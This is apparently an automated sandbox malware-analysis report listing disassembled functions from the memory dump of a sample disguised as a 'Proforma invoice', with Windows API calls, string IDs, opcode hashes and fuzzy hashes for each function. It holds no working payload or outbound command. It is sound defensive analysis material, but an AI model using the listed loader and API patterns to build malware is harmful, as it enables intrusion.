                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CriticalEnterEx_nolockSection___addlocaleref___freetlocinfo___removelocaleref__lock__mtinitlocknum__updatetlocinfo
                                                                                                                    • String ID: 80$80
                                                                                                                    • API String ID: 547918592-2001377372
                                                                                                                    • Opcode ID: 2eb394da55acabda86a3b07a1b903678401a539afe59e91fa4d937242ad1be1d
                                                                                                                    • Instruction ID: 14ae756638f777f6b55d9ca6706ebaa521a1d39a9be410d6a06b80f114770c45
                                                                                                                    • Opcode Fuzzy Hash: 2eb394da55acabda86a3b07a1b903678401a539afe59e91fa4d937242ad1be1d
                                                                                                                    • Instruction Fuzzy Hash: 18E08C31AAB301EAEA16FBB86917B4936649B00B21F60915AF06D651C1CDB404A08A1B
                                                                                                                    Function 00254C36 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00254B83,?), ref: 00254C44
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00254C56
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 2574300362-1355242751
                                                                                                                    • Opcode ID: a3f99d3a9d3e4d32b72e212972fcd4bab00fb388d92e1f8971a1901b88e0a622
                                                                                                                    • Instruction ID: c301d5fed1bd705e21de795d80d7b5a533e79e826ed4a58c27b34064639c61df
                                                                                                                    • Opcode Fuzzy Hash: a3f99d3a9d3e4d32b72e212972fcd4bab00fb388d92e1f8971a1901b88e0a622
                                                                                                                    • Instruction Fuzzy Hash: 1AD01230921713CFD7205F31DA0C646B7D4AF05356B15883BD997D65A4E770DCD0CA54
                                                                                                                    Function 00254C03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00254BD0,?,00254DEF,?,003152F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00254C11
                                                                                                                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00254C23
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                                                                    • API String ID: 2574300362-3689287502
                                                                                                                    • Opcode ID: fe9d973f41d811202b522dbdedf3033a7513dc9429465a910d06bee1bf6256a5
                                                                                                                    • Instruction ID: 54b6fa03069a37384acd6f54bdbcffa23cd4e79d82ee66b94a5bd5977a8cef8c
                                                                                                                    • Opcode Fuzzy Hash: fe9d973f41d811202b522dbdedf3033a7513dc9429465a910d06bee1bf6256a5
                                                                                                                    • Instruction Fuzzy Hash: EDD0EC30926713CFD7206F71DA08646B6E5AF0A756B15883B9896D6190E6B0D8908A54
                                                                                                                    Function 002D0DE7 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll,?,002D1039), ref: 002D0DF5
                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002D0E07
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                    • API String ID: 2574300362-4033151799
                                                                                                                    • Opcode ID: fc6d47c8f25be66178d66266a9ebf7415c0ae61d92faf9a73c2d6e60ad1b5cd5
                                                                                                                    • Instruction ID: 2b5be65c6440d9a46f2903df9131be5703abf9f2f3217bb4e275a4f1b8ee2717
                                                                                                                    • Opcode Fuzzy Hash: fc6d47c8f25be66178d66266a9ebf7415c0ae61d92faf9a73c2d6e60ad1b5cd5
                                                                                                                    • Instruction Fuzzy Hash: 7AD08230821323CFC3218F72D84838A73E8AF01342F008C2FD88AC22A0E6B0DCA08A14
                                                                                                                    Function 002C90E0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,00000001,002C8CF4,?,002DF910), ref: 002C90EE
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 002C9100
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                    • API String ID: 2574300362-199464113
                                                                                                                    • Opcode ID: 454e407bdc4430438be737576721166b290f816a47dcb1cd9cb20ddf4213fd08
                                                                                                                    • Instruction ID: 2a635e33d4beeb730aa709824755888f2896c067ce83815de14ffd256e9464ef
                                                                                                                    • Opcode Fuzzy Hash: 454e407bdc4430438be737576721166b290f816a47dcb1cd9cb20ddf4213fd08
                                                                                                                    • Instruction Fuzzy Hash: B9D01234921713CFD7209F31E91D64676D5AF05355B15883FD49AD6590E7B0C8D0C690
                                                                                                                    Function 00291714 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: LocalTime__swprintf
                                                                                                                    • String ID: %.3d$WIN_XPe
                                                                                                                    • API String ID: 2070861257-2409531811
                                                                                                                    • Opcode ID: 26168a253722b5a2fa29d4fe65c4505ec3398d1d4ce3a1315bbc455766da1985
                                                                                                                    • Instruction ID: 23e541b17f297bbd4f47d6d745b827c5068203aadc7ee4c83079a269643b212e
                                                                                                                    • Opcode Fuzzy Hash: 26168a253722b5a2fa29d4fe65c4505ec3398d1d4ce3a1315bbc455766da1985
                                                                                                                    • Instruction Fuzzy Hash: 8BD01271C3510BEACF0496D298998F9B37CAB08701F500452F90692080E3B18B74EA25
                                                                                                                    Function 002A717D Relevance: 6.3, APIs: 4, Instructions: 333COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: f9f70dedeaf50ff2409d2c06a6da3f4c078c3d8cb03d974fa6f8cef23b1b8378
                                                                                                                    • Instruction ID: 4caefed0000f1bf44a10af7e48b80ec5f5d1824d60ec60fb36f480d4405cbc09
                                                                                                                    • Opcode Fuzzy Hash: f9f70dedeaf50ff2409d2c06a6da3f4c078c3d8cb03d974fa6f8cef23b1b8378
                                                                                                                    • Instruction Fuzzy Hash: D7C18D74A14216EFCB14CFA4CC84EAEBBB5FF49304B158598E805EB251DB30ED91DB94
                                                                                                                    Function 002CE02A Relevance: 6.3, APIs: 4, Instructions: 307memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 002CE0BE
                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 002CE101
                                                                                                                      • Part of subcall function 002CD7A5: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 002CD7C5
                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 002CE301
                                                                                                                    • _memmove.LIBCMT ref: 002CE314
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3659485706-0
                                                                                                                    • Opcode ID: e1f2c6afbdf302217d7919f4a3517826284b0fda3bc4bad0a6e6e3e45db78a02
                                                                                                                    • Instruction ID: 0cc57477abb52c2dc22433b902088b16da0872285e7814b99a7aa2b77b764ddd
                                                                                                                    • Opcode Fuzzy Hash: e1f2c6afbdf302217d7919f4a3517826284b0fda3bc4bad0a6e6e3e45db78a02
                                                                                                                    • Instruction Fuzzy Hash: 71C135716283019FCB14DF28C480A6ABBE4FF89314F058A6EF8999B351D770E955CF82
                                                                                                                    Function 002C8093 Relevance: 6.3, APIs: 4, Instructions: 267COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CoInitialize.OLE32(00000000), ref: 002C80C3
                                                                                                                    • CoUninitialize.OLE32 ref: 002C80CE
                                                                                                                      • Part of subcall function 002AD56C: CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 002AD5D4
                                                                                                                    • VariantInit.OLEAUT32(?), ref: 002C80D9
                                                                                                                    • VariantClear.OLEAUT32(?), ref: 002C83AA
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 780911581-0
                                                                                                                    • Opcode ID: 778c46129393d5fb7c62f9d902ed1e30ce6f69a4e63e2f9c34fb95bb065d5adc
                                                                                                                    • Instruction ID: 78a81d6aeb0cdad1aad1064be64f70c8d78d48b4ae7bcf576f38363d5470593c
                                                                                                                    • Opcode Fuzzy Hash: 778c46129393d5fb7c62f9d902ed1e30ce6f69a4e63e2f9c34fb95bb065d5adc
                                                                                                                    • Instruction Fuzzy Hash: 32A14535624B419FCB00DF54C885B2AB7E4BF89314F08854DF99A9B3A1CB70EC54CB86
                                                                                                                    Function 002A687D Relevance: 6.2, APIs: 4, Instructions: 202memoryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Variant$AllocClearCopyInitString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2808897238-0
                                                                                                                    • Opcode ID: e0bf0cc7a12f9eb229ae6235b6f7606e1f4163a709465c53910cdd3305b4fff1
                                                                                                                    • Instruction ID: b46a0be22e13801cad86e9579a443a88f49a79ec519d8a47ef6c1a656b55e7ed
                                                                                                                    • Opcode Fuzzy Hash: e0bf0cc7a12f9eb229ae6235b6f7606e1f4163a709465c53910cdd3305b4fff1
                                                                                                                    • Instruction Fuzzy Hash: 4251E774730702DFDB209F65D499A2AB3E5AF56310F28C81FE586D7292DF74D8A48B04
                                                                                                                    Function 002D97F4 Relevance: 6.1, APIs: 4, Instructions: 140COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetWindowRect.USER32(00C2E5C0,?), ref: 002D9863
                                                                                                                    • ScreenToClient.USER32(00000002,00000002), ref: 002D9896
                                                                                                                    • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 002D9903
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ClientMoveRectScreen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3880355969-0
                                                                                                                    • Opcode ID: cae2635b47584280889c01ea16401fa5f244374a636d4fb5f0c109a1a35ce20a
                                                                                                                    • Instruction ID: a9ee5a4895a2a7b719f2d5b37345185a31b61cb132252a5a57520a4cb0a48f8a
                                                                                                                    • Opcode Fuzzy Hash: cae2635b47584280889c01ea16401fa5f244374a636d4fb5f0c109a1a35ce20a
                                                                                                                    • Instruction Fuzzy Hash: E1515E34A10209EFCB10CF18D894AAE7BB5FF45760F14815AF8659B3A0D731AD91DB90
                                                                                                                    Function 002A9A80 Relevance: 6.1, APIs: 4, Instructions: 129windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 002A9AD2
                                                                                                                    • __itow.LIBCMT ref: 002A9B03
                                                                                                                      • Part of subcall function 002A9D53: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 002A9DBE
                                                                                                                    • SendMessageW.USER32(?,0000110A,00000001,?), ref: 002A9B6C
                                                                                                                    • __itow.LIBCMT ref: 002A9BC3
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$__itow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3379773720-0
                                                                                                                    • Opcode ID: 81421e26daf7a4314205bf6434e5d17a3cdacabc4c54192a9b5c17aa08a940d2
                                                                                                                    • Instruction ID: fc65f174ac653638e35000e135eb17243a868e6bcf422044cad87433504482ab
                                                                                                                    • Opcode Fuzzy Hash: 81421e26daf7a4314205bf6434e5d17a3cdacabc4c54192a9b5c17aa08a940d2
                                                                                                                    • Instruction Fuzzy Hash: F241CF70A10209ABDF11EF55D845BFE7BB9EF45715F000069FD05A3291DB709AA8CBA1
                                                                                                                    Function 002C69AA Relevance: 6.1, APIs: 4, Instructions: 127networkCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • socket.WSOCK32(00000002,00000002,00000011), ref: 002C69D1
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 002C69E1
                                                                                                                      • Part of subcall function 00259837: __itow.LIBCMT ref: 00259862
                                                                                                                      • Part of subcall function 00259837: __swprintf.LIBCMT ref: 002598AC
                                                                                                                    • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 002C6A45
                                                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 002C6A51
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$__itow__swprintfsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2214342067-0
                                                                                                                    • Opcode ID: af89b89616ddfb24cd4e934d66443847b323374b9b1470a9ee2dd7766e0d58ce
                                                                                                                    • Instruction ID: 14f1137297dcb360daf587337376cfc9dadbd390c6c1a35b1836f1318584c2c9
                                                                                                                    • Opcode Fuzzy Hash: af89b89616ddfb24cd4e934d66443847b323374b9b1470a9ee2dd7766e0d58ce
                                                                                                                    • Instruction Fuzzy Hash: 0D419175750200AFEB60AF24DC8AF2A77E49B04B14F14851CFE19AF2D2DBB09D548B99
                                                                                                                    Function 002C641A Relevance: 6.1, APIs: 4, Instructions: 116COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,002DF910), ref: 002C64A7
                                                                                                                    • _strlen.LIBCMT ref: 002C64D9
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _strlen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4218353326-0
                                                                                                                    • Opcode ID: b8fe76c6005e6c1d5c02da68813cc79694bcad7018d14558c05bf297f29b0b81
                                                                                                                    • Instruction ID: b3a1a6314727a8fe0e632396d992c32083729f60c950d442ed250ec1320ccf02
                                                                                                                    • Opcode Fuzzy Hash: b8fe76c6005e6c1d5c02da68813cc79694bcad7018d14558c05bf297f29b0b81
                                                                                                                    • Instruction Fuzzy Hash: B141C671920104ABCB14EBA4DCD9FBEB7A8AF04310F648259FC1A97292DB30AD64CF54
                                                                                                                    Function 002BB7F4 Relevance: 6.1, APIs: 4, Instructions: 111fileCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 002BB89E
                                                                                                                    • GetLastError.KERNEL32(?,00000000), ref: 002BB8C4
                                                                                                                    • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 002BB8E9
                                                                                                                    • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 002BB915
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2013105634.0000000000251000.00000020.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2013092986.0000000000250000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.00000000002DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013145104.0000000000304000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013176320.000000000030E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2013189236.0000000000317000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_250000_Proforma invoice - Arancia NZ.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3321077145-0
                                                                                                                    • Opcode ID: 2e6dded400eb982a8eb34d7d3cfad9011fbf63cce9646d19c38a28bd22484f1b
                                                                                                                    • Instruction ID: 03368910b6840c456d280667fdfcdf9082abf9bff9c74c10095a47f4fa7003b4
                                                                                                                    • Opcode Fuzzy Hash: 2e6dded400eb982a8eb34d7d3cfad9011fbf63cce9646d19c38a28bd22484f1b
                                                                                                                    • Instruction Fuzzy Hash: 8C414839A20A11DFCB11EF14C588A5DBBE1AF4A310F098088EC4A9B362CB30FD55CF95
                                                                                                                    Function 002D8851 Relevance: 6.1, APIs: 4, Instructions: 109COMMON
